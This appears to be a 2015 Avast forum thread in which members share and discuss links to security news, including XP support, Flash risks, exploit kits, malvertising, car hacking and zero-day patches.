Well in the UK as far as I'm aware, The National Health Service (NHS) are paying a lot of money so that their XP systems continue to be updated. This is the same as some large companies paying for support for their XP Point Of Sale (POS) systems.
This has lead to the SP4 Hack so XP systems can continue receiving XP POS updates, no doubt in due course MS will kill this hack to try and drive them towards win10 purchase as they won't be eligible for a free OS Upgrade (as legit versions of Win7 and win8.x are).
-
Webutation Distributing Malware Through Safety Badge
https://blog.sucuri.net/2015/07/webutation-distributing-malware-through-safety-badge.html?utm_campaign=Security%20Advisory&utm_content=18261859&utm_medium=social&utm_source=googleplus
-
But there are others that find it hard to mitigate because lack of an alternative. Large department stores with XP driven cash systems are left out in the cold.
And I agree with you there are millions out there that should not have a "puter" because the way they run it is endangering themselves and others also. Driving an OS without a license should be considered as an offense.
polonus
The Unofficial SP4 for Windows XP: http://www.ryanvm.net/forum/viewtopic.php?t=10321&postdays=0&postorder=asc&start=0 (http://www.ryanvm.net/forum/viewtopic.php?t=10321&postdays=0&postorder=asc&start=0)
Extends updates for an additional 5 years. I would still recommend upgrading but, if that's not possible,
this is better than the alternative: No Updates....
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en
polonus
-
No-one needs flash anymore
Agreed Pol, I droped it several months ago and don't miss it... ;)
-
Still installed on my end, no malware or exploit yet :D
-
Hi Steven Winderlich,
You were lucky then as you know that adobe flash needs constant updating and then again no one needs it now for vids or whatever.
So I hope it will not "zombie"upon you. Just an example of what can happen with exploits. Here is a scan: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fblackorwhite.nl%2F where I searched for "comment", with at the bak of my head what was proposed here: http://blog.9bplus.com/if-i-were-an-attacker-third-party-js-librarie/ I am not an attacker, but just now imagine how easily this could have been done. Always remember those that want to protect just need the whole manual to get full protection an attacker just nbeeds one little wormhole.
pol
-
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
-
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en
polonus
Flash isn't dead at all:
Adobe Flash Player is directly integrated with Google Chrome and enabled by default. Available updates for Adobe Flash Player are automatically included in Chrome system updates.
A.) It's still there, you just don't see it any more in Chrome, but it is there and updated as part of Chrome.
B) You have got to be using Chrome, so that isn't going to happen for everyone (me for one).
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
So the same is true of Chrome&Flash, vulnerabilities can still be exploited before Chrome is updated.
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en (https://support.google.com/chrome/answer/108086?hl=en)
polonus
Flash isn't dead at all:
Adobe Flash Player is directly integrated with Google Chrome and enabled by default. Available updates for Adobe Flash Player are automatically included in Chrome system updates.
A.) It's still there, you just don't see it any more in Chrome, but it is there and updated as part of Chrome.
B) You have got to be using Chrome, so that isn't going to happen for everyone (me for one).
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
So the same is true of Chrome&Flash, vulnerabilities can still be exploited before Chrome is updated.
That's why you also run Flashcontrol (https://chrome.google.com/webstore/detail/flashcontrol/mfidmkgnfgnkihnjeklbekckimkipmoe?hl=en) in Chrome. :)
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en (https://support.google.com/chrome/answer/108086?hl=en)
polonus
Flash isn't dead at all:
Adobe Flash Player is directly integrated with Google Chrome and enabled by default. Available updates for Adobe Flash Player are automatically included in Chrome system updates.
A.) It's still there, you just don't see it any more in Chrome, but it is there and updated as part of Chrome.
B) You have got to be using Chrome, so that isn't going to happen for everyone (me for one).
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
So the same is true of Chrome&Flash, vulnerabilities can still be exploited before Chrome is updated.
That's why you also run Flashcontrol (https://chrome.google.com/webstore/detail/flashcontrol/mfidmkgnfgnkihnjeklbekckimkipmoe?hl=en) in Chrome. :)
Yes, but you miss my point Flash is still present, as are potential vulnerabilities which could be exploited. How are you to know that there isn't a potential vulnerability when you give flashcontrol the OK to load it.
It may well limit the risk but it doesn't completely remove it.
NoScript can also restrict the running of Flash (and JAVA if you have that too), also in the Flash Player settings you can restrict it from storing data on your system.
So there are ways to limit risk, but not completely remove it, this is why hard disk imaging is the way to go for a backup and recovery strategy.
-
ILOVEYOU – SPAM
https://blog.malwarebytes.org/social-engineering/2015/07/iloveyou-spam/?utm_source=Gplus&utm_medium=social
Concerning "flash" or anything else as far as that goes, "nothing gets fixed until it's broke".
-
Steer clear of low-tech hacks: How to keep your information safe
http://www.cnet.com/news/steering-clear-of-low-tech-hacks/
-
Mitnick proved that social engineering was and is an enormous threat and a prelude to all types of compromittal.
Get the uninformed ignorant persons to tell details they should not share with anyone can mean the difference between a succeeded attack and a trial run. Re: http://wiki.cas.mcmaster.ca/index.php/The_Mitnick_attack
pol
-
What is "compromittal" ???
-
What is "compromittal" ???
That's what Bob meant... ;)
-
What is "compromittal" ???
That's what Bob meant... ;)
Creative use of the English language ;)
I believe it should be "a prelude to all types of compromise" ?
See http://www.tfd.com/Compromit (http://www.tfd.com/Compromit) on 'Compromit' which mentions compromise.
2. To put to hazard, by some indiscretion; to endanger; to compromise; as, to compromit the honor or the safety of a nation.
-
Could it be a committed compromise ??? :) :) :)
-
Or, compromise committed?
-
Online Cheating Site AshleyMadison Hacked
http://krebsonsecurity.com/2015/07/online-cheating-site-ashleymadison-hacked/
-
Online Cheating Site AshleyMadison Hacked
http://krebsonsecurity.com/2015/07/online-cheating-site-ashleymadison-hacked/
Time Magazine had a similar article http://time.com/3964059/ashley-madison-affair-adultery-infidelity-cheating-hack/?xid=tcoshare
-
Microsoft releases emergency patch for all versions of Windows
http://www.zdnet.com/article/microsoft-releases-emergency-patch-for-critical-windows-flaw/
-
Microsoft releases emergency patch for all versions of Windows
http://www.zdnet.com/article/microsoft-releases-emergency-patch-for-critical-windows-flaw/ (http://www.zdnet.com/article/microsoft-releases-emergency-patch-for-critical-windows-flaw/)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1437422562314-27782.png)
MS15-078: Vulnerability in Microsoft font driver could allow remote code execution: July 16, 2015
-
Tech Support Scams And The Blue Screen of Death
https://blog.malwarebytes.org/fraud-scam/2015/07/techsupportscams-and-the-blue-screen-of-death/?utm_source=Gplus&utm_medium=social
-
Hi DavidR and bob3160,
"Comprommital is older English and is used here: Niles' Weekly Register: Containing Political, Political ..., Volume 32
"To avoid a compromittal of our neutrality" etc. etc. meaning a violation of sorts - compromise.
Mind that I am a Dutchman, not a native speaker...
polonus
-
Hi DavidR and bob3160,
"Comprommital is older English and is used here: Niles' Weekly Register: Containing Political, Political ..., Volume 32
"To avoid a compromittal of our neutrality" etc. etc. meaning a violation of sorts - compromise.
Mind that I am a Dutchman, not a native speaker...
polonus
Considering that English is an additional language you seem to have mastered very well, an occasional
new word coming from you is understandable. If I were to attempt to writhe something in Dutch, I highly
doubt it would be as well constructed as your posts in English. :)
(I was just having a little fun. :) Please realize that little fact.)
-
Tech Support Scams And The Blue Screen of Death
https://blog.malwarebytes.org/fraud-scam/2015/07/techsupportscams-and-the-blue-screen-of-death/?utm_source=Gplus&utm_medium=social
Given the fact most people have their systems set to default BSOD settings where it appears and disappears in a flash, the full screen BSOD display window that does not disappear should stand out like a sore thumb.
-
Tech Support Scams And The Blue Screen of Death
https://blog.malwarebytes.org/fraud-scam/2015/07/techsupportscams-and-the-blue-screen-of-death/?utm_source=Gplus&utm_medium=social
Given the fact most people have their systems set to default BSOD settings where it appears and disappears in a flash, the full screen BSOD display window that does not disappear should stand out like a sore thumb.
What should stand out is the support telephone number at the bottom - which most certainly isn't on genuine BSOD screens.
-
I've never had a real BSOD appear inside the web browser..... ;D
-
I've never had a real BSOD appear inside the web browser..... ;D
Nor have I, but the later update (if you can call it that) goes full screen rather than be contained in a browser window.
-
Hackers take control of Jeep and crash it into ditch
https://www.youtube.com/watch?v=mwZMvi6nKvU
I think Avast should create an anti-virus software for transport vehicle, and it looks scary when a hacker can take full control of your vehicle you could end up in your own grave yard.
-
Here's some more about the Chrysler hacking...
http://www.wired.com/2015/07/patch-chrysler-vehicle-now-wireless-hacking-technique/
http://gizmodo.com/hackers-have-the-power-to-remotely-hijack-half-a-millio-1719233440
http://www.washingtonpost.com/news/morning-mix/wp/2015/07/22/car-hacking-just-got-real-hackers-disable-suv-on-busy-highway/
http://www.theglobeandmail.com/globe-drive/culture/technology/security-experts-hack-into-moving-car-turn-off-engine/article25625345/
-
Microsoft rushes emergency security fix for Windows
http://www.cnet.com/news/microsoft-rushes-emergency-security-fix-for-versions-of-windows/
WP-CLI Guide: Secure WordPress Backup and Update
https://blog.sucuri.net/2015/07/wp-cli-guide-secure-wordpress-backup-update.html?utm_campaign=WordPress&utm_medium=social&utm_source=googleplus&utm_term=wpcli
-
Could this be completely secure or is there a (hidden) backdoor somewhere?
GCHQ 's Communications and Electronics Security Group certified Samsung KNOX-platform for Samsung Galaxy S6 & S6 Edge.
Would you trust such a smartphone certified by British Intelligence or should we be somewhat aware of some hidden backdoor? Read: http://www.cesg.gov.uk/servicecatalogue/Product-Assurance/CPA/Pages/Samsung-Galaxy-S6-and-S6-Edge-Certification-Details.aspx
Other government institutions do the same: https://www.samsungknox.com/en/security-certifications#5
Seen to NSA's track recordand recent revelations I would be a tad suspicious.
polonus
-
Could this be completely secure or is there a (hidden) backdoor somewhere?
GCHQ 's Communications and Electronics Security Group certified Samsung KNOX-platform for Samsung Galaxy S6 & S6 Edge.
Would you trust such a smartphone certified by British Intelligence or should we be somewhat aware of some hidden backdoor? Read: http://www.cesg.gov.uk/servicecatalogue/Product-Assurance/CPA/Pages/Samsung-Galaxy-S6-and-S6-Edge-Certification-Details.aspx (http://www.cesg.gov.uk/servicecatalogue/Product-Assurance/CPA/Pages/Samsung-Galaxy-S6-and-S6-Edge-Certification-Details.aspx)
Other government institutions do the same: https://www.samsungknox.com/en/security-certifications#5 (https://www.samsungknox.com/en/security-certifications#5)
Seen to NSA's track recordand recent revelations I would be a tad suspicious.
polonus
I would trust it as much as I would trust a phone certified by the NSA. :) :o
-
Hi bob3160,
Me too, I just only reported what info I found online. I think our whole security situation on the Internet and via the "Internet of things" is not what it should be or rather what it could be and political incompetence to understand where this all leads to or could lead to is not helping either.
Damian
-
Zero-Day Flaws Found in Internet Explorer, Everyone Advised to Stop Using the Browser
http://news.softpedia.com/news/zero-day-flaws-found-in-internet-explorer-everyone-advised-to-stop-using-the-browser-487592.shtml
-
Facebook Marketing, A New Method for Scammers?
https://blog.malwarebytes.org/fraud-scam/2015/07/facebook-marketing-a-new-method-for-scammers/?utm_source=Gplus&utm_medium=social
Fake jQuery Scripts in Nulled WordPress Plugins
https://blog.sucuri.net/2015/05/fake-jquery-scripts-in-nulled-wordpress-pugins.html?utm_campaign=Fake%20jQuery%20Scripts%20in%20Nulled%20WordPress%20Plugins%20Blogpost&utm_medium=social&utm_source=googleplus
-
Malicious Google Analytics Referral Spam
https://blog.sucuri.net/2015/07/malicious-google-analytics-referral-spam.html?utm_campaign=Malicious%20Google%20Analytics%20Referral%20Spam%20Blogpost&utm_medium=social&utm_source=googleplus
Privilege escalation vulnerability found in OS X
https://blog.malwarebytes.org/mac/2015/07/privilege-escalation-vulnerability-found-in-os-x/?utm_source=Gplus&utm_medium=social
This is partly informative and advertising! But you will get the message.
Scroll down for the video https://sucuri.net/website-firewall/ddos-protection?utm_campaign=DDoS&utm_medium=social&utm_source=googleplus
-
Some explain it as awesome and cool and others call it the scariest feature of Google they'd ever seen - it is called Your Timeline.
Read: http://google-latlong.blogspot.nl/2015/07/your-timeline-revisiting-world-that.html
Link author: Gerard Sanz, Product Manager.
They say: "Your Timeline is private and visible only to you; and you control the locations you choose to keep".
I'd wonder if Big Brother is not also aware of all my geo-location timeline,
and I very much doubt Big Brother is not fully aware.
polonus
-
Some explain it as awesome and cool and others call it the scariest feature of Google they'd ever seen - it is called Your Timeline.
Read: http://google-latlong.blogspot.nl/2015/07/your-timeline-revisiting-world-that.html (http://google-latlong.blogspot.nl/2015/07/your-timeline-revisiting-world-that.html)
Link author: Gerard Sanz, Product Manager.
They say: "Your Timeline is private and visible only to you; and you control the locations you choose to keep".
I'd wonder if Big Brother is not also aware of all my geo-location timeline,
and I very much doubt Big Brother is not fully aware.
polonus
It's scary but the Timeline feature in Facebook is even more scary.
It's easy to see what's kept me busy today:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1437686076886-18488.png)
-
Because of four zero-days now in the open in IE and MS not meeting the deadline
better refrain from using Blue E for the moment until patched.:
http://www.zerodayinitiative.com/advisories/ZDI-15-359/ & http://www.zerodayinitiative.com/advisories/ZDI-15-360/
& http://www.zerodayinitiative.com/advisories/ZDI-15-361/
polonus
-
SweetCaptcha Returns Hijacking Another Plugin
https://blog.sucuri.net/2015/07/sweetcaptcha-returns-hijacking-another-plugin.html?utm_campaign=SweetCaptcha%20Returns%20Hijacking%20Another%20Plugin%20Blogpost&utm_medium=social&utm_source=googleplus
Twitch “Audio Fix” Hijacks Stream Key
https://blog.malwarebytes.org/fraud-scam/2015/07/twitch-audio-fix-hijacks-stream-key/?utm_source=Gplus&utm_medium=social
-
Because of four zero-days now in the open in IE and MS not meeting the deadline
better refrain from using Blue E for the moment until patched.:
http://www.zerodayinitiative.com/advisories/ZDI-15-359/ & http://www.zerodayinitiative.com/advisories/ZDI-15-360/
& http://www.zerodayinitiative.com/advisories/ZDI-15-361/
polonus
...vulnerabilities reported by ZDI have already been fixed in bulletins MS14-037 on July 8, 2015 and MS15-018 on March 10, 2015...
-
Cybercriminal's favorite exploit kit by far is named Angler:
Angler dominated with an 82% of the exploit kit market share - https://blogs.sophos.com/2015/07/21/a-closer-look-at-the-angler-exploit-kit/ link article author = Fraser Howard.
Qualities of this malware: http://blogs.cisco.com/security/talos/angler-domain-shadowing
Link article author is Nick Biasini and edited by Joel Esler.
posted here by polonus
-
Security Researchers wary of Wassenaar Treaty. Discriminating export restrictions could severely hamper international digital security. Lobbyists and none-technical political forces could have clipped the wings of security researchers and could have hampered security for the global community and especially outside the "Wassenaar Global Empire" with the proposals as they are now for CFAA.
What does it bring if you have a computer with a Tb of memory and you cannot work it because of the slow Celeron processor it has inside, you'd better have a swift processor on a computer with an external hard disk?
Or what if you run privacy risks in parts of the world because of encryption export restrictions, even worse if by technical incompetence the encryption is served the wrong end up.
It is like old Rome revisited, the Romans were producing cheese with the use of rennet and germanic/slavonic tribes outside the limes (bounderies) of the empire they made their "ost"/"ser" passing milk through nets made of the Galium plant, also known as catchweed or goosegrass, later they adopted to the new Roman ways of life and produced real cheese (word taken from Latin caseus), with Wassenaar rules "caseus" would never have been exported. Now we even produce kosher and halal cheese.
Read here: https://threatpost.com/security-researchers-wary-of-proposed-wassenaar-rules/112937 Article author = Michael Mimoso.
polonus
-
Leaked files from state-sponsored hackers reveal which protection their trojans can’t get past
Data breaches on international surveillance firms can teach us a lot about which antivirus programs are actually working.
Recent high-profile leaks show that malware from surveillance firms Hacking Team and FinFisher can't be detected by more than 80% of antivirus programs!
http://blog.emsisoft.com/2015/07/27/leaked-files-from-state-sponsored-hackers-reveal-which-protection-their-trojans-cant-get-past/?ref=ticker150727&utm_source=newsletter&utm_medium=newsletter&utm_content=blog&utm_campaign=ticker150727
Hacking Team’s trojan detected by 5 out of 34 antivirus vendors
http://ht.transparencytoolkit.org/KnowledgeBase/-%20AV%20Test%20Summary%20-%20%5DHT%5B%20%3A%3A%20KnowledgeBase%20Product.html
-
Hi dear avast users,
10 million potential victims of malverting leading to Angler exploit infections.
Read: http://www.cyphort.com/malvertising-spike/ link article author = Nick Bilogorskiy.
Malvertising via -ads.us.e-planning.net is being blocked for me by uBlock Origin.
Users should always have protection via a decent adblocker.
Understand that using adblockers is a vital part of your protection.
"Do not surf without being protected, else you will surely get infected". ;D
polonus
-
The Home Office warns against TorrentLocker-ransomware with an additional advice to use HTTPS only: https://www.gov.uk/government/news/home-office-fraudulent-email-warning
polonus
-
Quantserve trackers and adware pusher use soup. It is a soup which taste I do not like and why I have an adblocker like uBlock Origin to keep such destinations blocked. See what Visitor related info is gathered via soup
Results from scanning URL: httc://edge.quantserve.com/quant.js
[code]
window.SOUP_test_ab = "";
Visitor related
Login status of the user - all following flags apply to a logged in visitor (= Soup user) only
Blog privacy - the privacy status the visitor configured for their blog
NSFW toggle - this pertains to an upcoming release that let's the visitor toggle if they want to see NSFW material in /everyone, /friends etc.
Exports - tells us which exports the visitor has configured (currently this can only be facebook)
Reported someone - did the visitor report posts for anything, like spam. This may pertain to the visitors engagement level.
Email - did the visitor supply an email with their registration?
Which imports did the visitor configure?
Did the visitor connect their account to facebook, either via export or signup?
How long has the visitor had his account with Soup, in days
Which pool does the visitor belong to? Currently there is only A, which are all members of @testkitchen, and B, which is the default for everyone. We may use this to do split-testing in the future.
Is the visitor using an adblocker?
How many feeds is the visitor importing to their blog?
How many original (non-imported) posts does the visitor have on their blog?
Days since the last original post of the visitor
Number of groups the visitor is member of
polonus
-
The Home Office warns against TorrentLocker-ransomware with an additional advice to use HTTPS only: https://www.gov.uk/government/news/home-office-fraudulent-email-warning
polonus
Timely warning notification there. I'm sure avast will have protection soon.
-
Update on Rowhammer:
http://www.slate.com/articles/technology/bitwise/2015/07/rowhammer_security_exploit_why_a_new_security_attack_is_truly_terrifying.html (http://www.slate.com/articles/technology/bitwise/2015/07/rowhammer_security_exploit_why_a_new_security_attack_is_truly_terrifying.html)
Earlier post (March 2015) by Pondus here:
https://forum.avast.com/index.php?topic=52252.msg1192762#msg1192762 (https://forum.avast.com/index.php?topic=52252.msg1192762#msg1192762)
(EDIT: Corrected year to 2015)
-
Advert Strikes Out Via Copycat Gaming Site
https://blog.malwarebytes.org/malvertising-2/2015/07/advert-strikes-out-via-copycat-gaming-site/?utm_source=Gplus&utm_medium=social
Ukrainian Media Site RBC[dot]UA Drops CryptoWall Ransomware
https://blog.malwarebytes.org/exploits-2/2015/07/ukrainian-media-site-rbcdotua-drops-cryptowall-ransomware/?utm_source=Gplus&utm_medium=social
Fake Safari update installs MacKeeper, ZipCloud
https://blog.malwarebytes.org/fraud-scam/2015/07/fake-safari-update-installs-mackeeper-zipcloud/?utm_source=Gplus&utm_medium=social
-
Malwarebytes Anti-Malware Now Supports Windows 10 (Not surprising.)
https://blog.malwarebytes.org/news/2015/07/malwarebytes-anti-malware-now-supports-windows-10/?utm_source=Gplus&utm_medium=social
USA TODAY Fantasy Sports Discussion Forum Serves Malware
https://blog.malwarebytes.org/exploits-2/2015/07/usa-today-fantasy-sports-discussion-forum-serves-malware/?utm_source=Gplus&utm_medium=social
-
How your privacy has been thrown out of the window on Google Android:
http://arstechnica.com/gadgets/2013/10/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/
That was written in 2013 and the situation has only grown worse with adblockers taken from Google Shop etc. etc.
polonus
-
BIND users should immediately upgrade - there is no circumventing this vulnerability can be easily attacked by exploitkits.
Read: https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/ posted by Michael McNally
This general bug could mean a big problem when not patched.
polonus
-
Defeating The Fake iOS Crash Reports
https://blog.malwarebytes.org/fraud-scam/2015/07/defeating-the-fake-ios-crash-reports/?utm_source=Gplus&utm_medium=social
-
BIND9 – Denial of Service Exploit in the Wild
https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html?utm_campaign=BIND9%20%E2%80%93%20Denial%20of%20Service%20Exploit%20in%20the%20Wild%20Blogpost&utm_medium=social&utm_source=googleplus
-
Cybercriminals planning future atatcks preying on existing vulnerabilities:
http://www.net-security.org/secworld.php?id=18691
For instance: https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
Shellshock or Bashdoor: https://en.wikipedia.org/wiki/Shellshock_(software_bug)
Reconnaissance attack tools: http://www.sans.org/reading-room/whitepapers/tools/tools-tools-tools-406
(P.S. Use of such tools could be offensive, restricted and under circumstances illegal - )
polonus
-
Don't fall for this email:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1438634737382-33018.png)
The attachment will not update your system to Windows 10
The attachment will Encrypt the information on your Computer.
It will cost you money to get the key to un-encrypt the files.
More information at:
http://blogs.cisco.com/security/talos/ctb-locker-win10 (http://blogs.cisco.com/security/talos/ctb-locker-win10)
-
Apple iTunes & AppStore - Persistent Invoice Vulnerability
http://www.vulnerability-lab.com/get_content.php?id=1512
-
Why adblocking stays your best line of defense against malvertising campaigns, read: https://blog.malwarebytes.org/malvertising-2/2015/08/large-malvertising-campaign-takes-on-yahoo/
Yahoo together with other big companies is working on a better ad experience ;) (ironical wink)
polonus
-
Why adblocking stays your best line of defense against malvertising campaigns, read: https://blog.malwarebytes.org/malvertising-2/2015/08/large-malvertising-campaign-takes-on-yahoo/
Yahoo together with other big companies is working on a better ad experience ;) (ironical wink)
polonus
Yep, there is no such thing as a 'better ad experience' other than removing them ;)
-
Chinese Commercial VPN service makes use of hacked Windows servers abroad: https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/
The main reason for the brute force attacks, disabling of the firewall and windows defender - 31 hacked Windows servers were detected. The main reason for the hacks could be it was cost saving.
polonus
-
But American VPN to China is also not very secure: https://www.goldenfrog.com/vyprvpn/features/vpn-server-locations
-> http://toolbar.netcraft.com/site_report?url=https://www.goldenfrog.com dns report: http://www.dnsinspect.com/datafoundry.com/1438711068 nameserver version info proliferation turns up moderate bind security: https://www.redhat.com/archives/rhsa-announce/2014-January/msg00013.html caching only Bind server.
Bind
To hide version in when using Bind, open named.conf configuration file using your favorite editor, go to options section and set a custom version string using version option. So goldenfrog already has some rust.
polonus
-
Large Malvertising Campaign Takes on Yahoo!
https://blog.malwarebytes.org/malvertising-2/2015/08/large-malvertising-campaign-takes-on-yahoo/?utm_source=Gplus&utm_medium=social
DYLD_PRINT_TO_FILE exploit found in the wild
https://blog.malwarebytes.org/mac/2015/08/dyld_print_to_file-exploit-found-in-the-wild/?utm_source=Gplus&utm_medium=social
-
Researcher says he can hack GM’s OnStar app, open vehicle, start engine
http://venturebeat.com/2015/07/30/researcher-says-can-hack-gms-onstar-app-open-vehicle-start-engine/
-
Advice from Perry Mertens to uninstall NETBIOS, a protocol dating back to 1983. [/b
Read: ]https://www.linkedin.com/pulse/netbios-30-years-old-forgotten-backdoor-microsoft-windows-mertens
The vulnerability problems of NETBIOS: https://technet.microsoft.com/en-us/library/security/ms00-047.aspx
Earlier we got the same advice here: https://isc.sans.edu/diary/Is+it+time+to+get+rid+of+NetBIOS%3F/12454
polonus
-
Advice from Perry Mertens to uninstall NETBIOS, a protocol dating back to 1983. [/b
Read: ]https://www.linkedin.com/pulse/netbios-30-years-old-forgotten-backdoor-microsoft-windows-mertens
The vulnerability problems of NETBIOS: https://technet.microsoft.com/en-us/library/security/ms00-047.aspx (https://technet.microsoft.com/en-us/library/security/ms00-047.aspx)
Earlier we got the same advice here: https://isc.sans.edu/diary/Is+it+time+to+get+rid+of+NetBIOS%3F/12454 (https://isc.sans.edu/diary/Is+it+time+to+get+rid+of+NetBIOS%3F/12454)
polonus
Affected Software:
Microsoft Windows NT 4.0 Workstation
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows 2000
-
What does a DDoS attack look like?
https://www.youtube.com/watch?utm_campaign=What%20does%20a%20DDoS%20attack%20look%20like%20YouTube%20Video&utm_medium=social&utm_source=googleplus&v=w-I19knBFTM
-
“Thunderstrike 2” rootkit uses Thunderbolt accessories to infect Mac firmware
http://arstechnica.com/apple/2015/08/thunderstrike-2-rootkit-uses-thunderbolt-accessories-to-infect-mac-firmware/
-
0-day bug in fully patched OS X comes under active exploit to bypass password protection
http://arstechnica.com/security/2015/08/0-day-bug-in-fully-patched-os-x-comes-under-active-exploit-to-hijack-macs/
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed
polonus
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed (http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed)
polonus
Bad Google at it again. :) :) :)
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed (http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed)
polonus
Bad Google at it again. :) :) :)
Umm, what about sneaky Chrome installs, like pre-checked opt-in options. I wonder who that is, just had an offer again for Chrome and its a free download. Strange when it is free already.
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed (http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed)
polonus
Bad Google at it again. :) :) :)
Umm, what about sneaky Chrome installs, like pre-checked opt-in options. I wonder who that is, just had an offer again for Chrome and its a free download. Strange when it is free already.
Doesn't look like that message is coming from Google ???
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed (http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed)
polonus
Bad Google at it again. :) :) :)
Umm, what about sneaky Chrome installs, like pre-checked opt-in options. I wonder who that is, just had an offer again for Chrome and its a free download. Strange when it is free already.
Doesn't look like that message is coming from Google ???
I know it was a back handed reference to avast installing it (default opt-in) for the unwary.
Followed with avast pushing it hard in the popup ads, even though in my settings I have the 'Do not use Chrome as Avast default browser.' I though they would get the message that way.
-
@David,
Some of us do use Chrome as our default browser.
When I upgraded one of the systems to Windows 10, I was actually happy to see the Chrome recommendation. :)
-
@David,
Some of us do use Chrome as our default browser.
When I upgraded one of the systems to Windows 10, I was actually happy to see the Chrome recommendation. :)
Yes they do and that is their choice, but I tire of having it rammed down my throat at every opportunity.
-
If you're using Firefox make sure you're using version 39 or later.
If you haven't updated, this is waiting for you:
https://billmullins.wordpress.com/2015/08/07/tech-thoughts-net-news-friday-edition-august-7-2015/ (https://billmullins.wordpress.com/2015/08/07/tech-thoughts-net-news-friday-edition-august-7-2015/)
-
If you're using Firefox make sure you're using version 39 or later.
If you haven't updated, this is waiting for you:
https://billmullins.wordpress.com/2015/08/07/tech-thoughts-net-news-friday-edition-august-7-2015/ (https://billmullins.wordpress.com/2015/08/07/tech-thoughts-net-news-friday-edition-august-7-2015/)
According to another link on that page it should be Firefox version 39.0.3 (released through FF auto update if you haven't disabled it) that fixes this vulnerability not just 39.0.
-
Who’s Behind Your Proxy? Uncovering Bunitu’s Secrets
https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/?utm_source=Gplus&utm_medium=social
Chinese Actors Copy and Paste HackingTeam Zero-Days in Site Hack
https://blog.malwarebytes.org/exploits-2/2015/08/chinese-actors-copy-and-paste-hackingteam-zero-days-in-site-hack/?utm_source=Gplus&utm_medium=social
Fake jQuery Scripts in Nulled WordPress Plugins
https://blog.sucuri.net/2015/05/fake-jquery-scripts-in-nulled-wordpress-pugins.html?utm_campaign=Fake%20jQuery%20Scripts%20in%20Nulled%20WordPress%20Plugins%20Blogpost&utm_medium=social&utm_source=googleplus
“Payment Confirmation Slip” Spam Offers Up Malware
https://blog.malwarebytes.org/online-security/2015/08/payment-confirmation-slip-spam-offers-up-malware/
The Dynamics of Passwords (This one is one everyone should read)
https://blog.sucuri.net/2015/02/the-history-of-passwords.html?utm_campaign=The%20Dynamics%20of%20Passwords%20Blogpost&utm_medium=social&utm_source=googleplus
One good password checker is... How Secure Is my Password (https://howsecureismypassword.net/)
Ask Sucuri: How did my WordPress Website get Hacked? – A Tutorial
https://blog.sucuri.net/2015/08/ask-sucuri-how-did-my-wordpress-website-get-hacked-a-tutorial.html?utm_campaign=Ask%20Sucuri%3A%20How%20did%20my%20WordPress%20Website%20get%20Hacked%3F%20%E2%80%93%20A%20Tutorial&utm_medium=social&utm_source=googleplus
edit: typo
-
Critical patch for firefox, please update: http://www.scmagazine.com/mozilla-issues-new-firefox-version/article/431575/?utm_source=dlvr.it&utm_medium=twitter
Patch repaired unauthorized access to device data through the USB interface.
Shadow IT worse than ever thought - the best approach is the “Five D’s”: Discover, Defend, Destroy, Develop and Discuss
quote taken from XO Communications’ John Grady - read: http://www.itbusinessedge.com/blogs/infrastructure/shadow-it-worse-than-we-thought.html
polonus
-
Critical patch for firefox, please update: http://www.scmagazine.com/mozilla-issues-new-firefox-version/article/431575/?utm_source=dlvr.it&utm_medium=twitter (http://www.scmagazine.com/mozilla-issues-new-firefox-version/article/431575/?utm_source=dlvr.it&utm_medium=twitter)
Patch repaired unauthorized access to device data through the USB interface.
Shadow IT worse than ever thought - the best approach is the “Five D’s”: Discover, Defend, Destroy, Develop and Discuss
quote taken from XO Communications’ John Grady - read: http://www.itbusinessedge.com/blogs/infrastructure/shadow-it-worse-than-we-thought.html (http://www.itbusinessedge.com/blogs/infrastructure/shadow-it-worse-than-we-thought.html)
polonus
